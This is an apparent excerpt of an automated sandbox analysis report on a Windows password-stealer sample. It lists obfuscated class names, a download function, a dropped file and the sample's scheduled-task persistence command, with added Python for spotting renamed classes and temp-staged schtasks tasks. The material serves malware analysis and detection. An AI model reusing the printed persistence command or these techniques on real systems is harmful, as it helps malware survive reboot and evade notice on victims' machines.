            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, T0le2hY2rtIJPNaxna6.csHigh entropy of concatenated method names: 'F5J5kWV3d8', 'SIv5fRXJPT', 'jrP5MFOd5N', 'gus5DBBqhN', 'l0Q57u1KbD', 'mk25j7S3DS', 'T4l5ywNUl9', 'TiA5FV6RMb', 'kxv53PZsZX', 'BV15wJuAl8'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, XfmVEBR51QqlUKyLtF.csHigh entropy of concatenated method names: 'oC68Qi8gG5', 'zHp8Tm0XhP', 'LUA8SZbiI6', 'XrrSbvaOqg', 'Pr8Sz4FAUw', 'bDB82JNMuk', 'gGL8Y3QdOa', 'r8O8NjFJbc', 'WQH8hx3qxy', 'H1h8mNKJQx'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, h2aH3Zw7YiXsYvfS8o.csHigh entropy of concatenated method names: 'oiSs71gP9h', 'js9syAupJF', 'LDWTO4p3GE', 'ILDTLU4jFQ', 'Ua3T0oCYeZ', 'BYUTWk7ZOP', 'MODTRY6KkR', 'JFNTeeoSIl', 'CxITU8Yl3m', 'fSWTpgKtaw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, AYNBkYmfaoQBEXCiUE.csHigh entropy of concatenated method names: 'IVwY8fxCju', 'lDrYENuN7u', 'vSLYAygh9H', 'kPRYneT2aH', 'GfSYa8odvi', 'Cb6YrSAUsK', 'sHfcNX06N4fGkTH61i', 'GhFA1oGUwWO5rTCfHS', 'pNiYY9GDlG', 'lHUYhclGxS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, GQRECeC3l81YAYQ30a.csHigh entropy of concatenated method names: 'SNLapDJay7', 'jZga6SH1My', 'dAgaCmd8FQ', 'XIfauSDTEH', 'iAmaJIU9UO', 'UHYaOtayXJ', 'DtwaL6KjK1', 'T2ia0vGXvf', 'ehGaWBr6Cf', 'DXoaR90KsS'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, cPlswiYh05wBgPDnxUk.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YtUiCUwKlJ', 'FiaiuDBA7Q', 'A8hiI17tUZ', 'gv3i9C93hv', 'OpRiZ1R7Wi', 'XEQigpwuKQ', 'jFiiXTFiVn'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, wvijb6vSAUsKHvHnSp.csHigh entropy of concatenated method names: 'KdFSojbX83', 'FlhS12VQxR', 'x5pSsfwmaG', 'CLgS8HyUbT', 'GyISEicECP', 'NYHsZOEqTa', 'dehsgbjhOy', 'qCAsXmqh5A', 'KJRsV83yh0', 'DmfsKuxOTp'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, uaPTeHgKCLb8SQmwLp.csHigh entropy of concatenated method names: 't85cVyNwsT', 'WP1cbyNmtS', 'z1342myyaX', 'TFZ4YkW8uc', 'FXwclfmTtT', 'Y68c6TElhn', 'Pp0cGBVXUl', 'f5ncCydqow', 'P0bcuwyrlA', 'hj6cIxXmJI'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, ewNl33b2siSM29DQHA.csHigh entropy of concatenated method names: 'x7H5YqtmE6', 'dX05hACy36', 'HcG5mTDJlq', 'tUs5QPNJsA', 'nel51cN6RM', 'Ikb5sc4kDe', 'OPb5SMrLkn', 'ogU4X6ZYmw', 'HEe4VLScG9', 'gjb4KEG767'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.405d428.4.raw.unpack, gbF8glUNGRlbMNV65a.csHigh entropy of concatenated method names: 'Wf88k8R4Vr', 'vTs8fyRjZk', 'u1u8Muivvk', 'Gji8DNLQND', 'IfH8786dSY', 'biP8jcZ3ra', 'YwA8y75RXu', 'o8v8F21eln', 'DTP83usHPV', 'mqN8wcIjvw'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.5830000.7.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe.5830000.7.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: 10.2.ZRuVeAoBoxootS.exe.299d9d4.3.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
            Source: 10.2.ZRuVeAoBoxootS.exe.299d9d4.3.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeCode function: 16_2_004063C6 ShellExecuteW,URLDownloadToFileW,16_2_004063C6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exeFile created: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exeJump to dropped file
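The "High entropy of concatenated method names" findings above are a renaming-obfuscation heuristic: an identifier renamer replaces every method name it is allowed to with a random alphanumeric string, so the concatenation of a class's method names reads like random text. Names that override framework virtuals survive untouched, which is why 'Dispose' and 'ProcessDialogKey' (a Control subclass), 'CanConvertFrom'/'ConvertFrom'/'ConvertTo' (a TypeConverter) and 'Next', 'Next', 'Next', 'NextBytes' (a System.Random subclass) still appear among the renamed ones; those survivors are the quickest way to work out what a renamed class is. The script below is an added example, not Joe Sandbox's implementation: it computes the statistic on the names the report lists for QBy45BY4uMbUQs88Qq.cs and on a constructed baseline of ordinary .NET names; the 5.0 bits-per-character cut-off and the digit-mixing check are assumptions made for illustration, not the sandbox's thresholds.

```python
import math
from collections import Counter

# Method names exactly as the report lists them for QBy45BY4uMbUQs88Qq.cs (taken from the page)
OBFUSCATED = ["QByY45B4u", "EbUNQs88Q", "D8PguGCCm", "gfwtorebq", "rQ9oD0JNd",
              "cBrXiBGn5", "sgS08fT72", "lmAQKmrG6", "qn1mTNvNO", "K084ZL4CG"]

# Constructed baseline: names an unobfuscated WinForms-style class might carry
# (an assumption for comparison, not taken from the sample)
BASELINE = ["Dispose", "InitializeComponent", "OnLoad", "ButtonClick", "ReadSettings",
            "WriteSettings", "ProcessDialogKey", "UpdateStatus", "ConvertFrom", "ConvertTo"]

# Assumed cut-off in bits per character for this example; Joe Sandbox's own threshold is not published here
ENTROPY_THRESHOLD = 5.0


def shannon_entropy(text):
    """Shannon entropy of `text` in bits per character (0.0 for the empty string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names):
    """Entropy of the concatenated method names, the statistic the report's heuristic is built on."""
    return shannon_entropy("".join(names))


def digit_mixed_fraction(names):
    """Fraction of names mixing letters and digits; renamers emit these, hand-written code rarely does."""
    if not names:
        return 0.0
    mixed = [n for n in names
             if any(ch.isdigit() for ch in n) and any(ch.isalpha() for ch in n)]
    return len(mixed) / len(names)


def looks_obfuscated(names, threshold=ENTROPY_THRESHOLD):
    """Flag a class whose concatenated method names exceed the entropy threshold."""
    return method_name_entropy(names) > threshold


def summarize(names):
    """Return the numbers an analyst would want next to each flagged class."""
    return {
        "entropy_bits_per_char": round(method_name_entropy(names), 2),
        "digit_mixed_fraction": digit_mixed_fraction(names),
        "flagged": looks_obfuscated(names),
    }


if __name__ == "__main__":
    for label, names in (("QBy45BY4uMbUQs88Qq.cs", OBFUSCATED), ("baseline", BASELINE)):
        print(label, summarize(names))
```

Renamed classes score well above 5 bits per character because upper case, lower case and digits are all used almost uniformly; English-derived identifiers sit around 4.4 even when they are camel-cased. The framework-override names lower the score slightly but never enough to hide a renamed class, so the heuristic fires on every class of the sample, as the report shows.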

            Boot Survival

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,16_2_00418A00
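The schtasks line above is the persistence step: the sample writes a task definition to a temporary file and registers it from there under the task path Updates\ZRuVeAoBoxootS. Two details matter for detection. The process image is C:\Windows\SysWOW64\schtasks.exe although the command line names System32, because the 32-bit sample gets the WoW64-redirected binary, so a rule should match on the image basename rather than the full path. And the thing that separates this from an installer is the /XML argument pointing into a temp directory, not the /Create itself. The Python below is an added example, not the report's Sigma rule: it runs that check over constructed process-creation records (Sysmon-style Image/ParentImage/CommandLine fields are an assumption) in which only the first command line is the one from the report; the other three are benign look-alikes, and the temp-directory pattern is a starting point to tune per environment.

```python
import ntpath
import re

# Constructed process-creation records in Sysmon Event ID 1 style (field names assumed).
# EVENTS[0] is the command line from the report; the rest are constructed benign look-alikes.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "ParentImage": r"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZRuVeAoBoxootS" /XML "C:\Users\user\AppData\Local\Temp\tmpAAF6.tmp"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Program Files\Vendor\setup.exe",
     "CommandLine": r'schtasks.exe /Create /TN "Vendor\Updater" /XML "C:\Program Files\Vendor\updater.xml"'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Create /SC DAILY /TN Backup /TR "C:\Tools\backup.cmd" /ST 02:00'},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'schtasks /Delete /TN "Updates\ZRuVeAoBoxootS" /F'},
]

# Directories where a task XML is rarely staged by legitimate software (assumption; tune per environment)
TEMP_PATH_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|^[A-Za-z]:\\Temp\\", re.IGNORECASE)


def split_windows_cmdline(cmdline):
    """Split a Windows command line on whitespace while keeping double-quoted arguments intact."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def schtasks_option(tokens, name):
    """Return the argument following option `name` (case-insensitive), or None if absent."""
    lowered = [t.lower() for t in tokens]
    if name.lower() not in lowered:
        return None
    i = lowered.index(name.lower())
    return tokens[i + 1] if i + 1 < len(tokens) else None


def task_from_temp(event):
    """Return (task name, xml path) for `schtasks /Create ... /XML <temp file>`, else None."""
    # Basename match covers both System32 and the WoW64-redirected SysWOW64 copy
    if ntpath.basename(event["Image"]).lower() != "schtasks.exe":
        return None
    tokens = split_windows_cmdline(event["CommandLine"])
    if "/create" not in {t.lower() for t in tokens}:
        return None
    xml = schtasks_option(tokens, "/XML")
    if xml is None or not TEMP_PATH_RE.search(xml):
        return None
    return schtasks_option(tokens, "/TN"), xml


def triage(events):
    """Run the check over a batch of events and return each hit with the parent that spawned schtasks."""
    hits = []
    for ev in events:
        match = task_from_temp(ev)
        if match:
            task, xml = match
            hits.append({"task": task, "xml": xml, "parent": ev["ParentImage"]})
    return hits


if __name__ == "__main__":
    for hit in triage(EVENTS):
        print(f"[!] task {hit['task']!r} registered from {hit['xml']} by {hit['parent']}")
```

On a hit, the temp file the task was built from may already be gone, but the registered definition can still be read back with `schtasks /Query /TN "Updates\ZRuVeAoBoxootS" /XML` or from %SystemRoot%\System32\Tasks\Updates\ZRuVeAoBoxootS, which gives the trigger and the action the sample wanted to survive reboot.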

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe | Code function: 16_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,16_2_0041A8DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
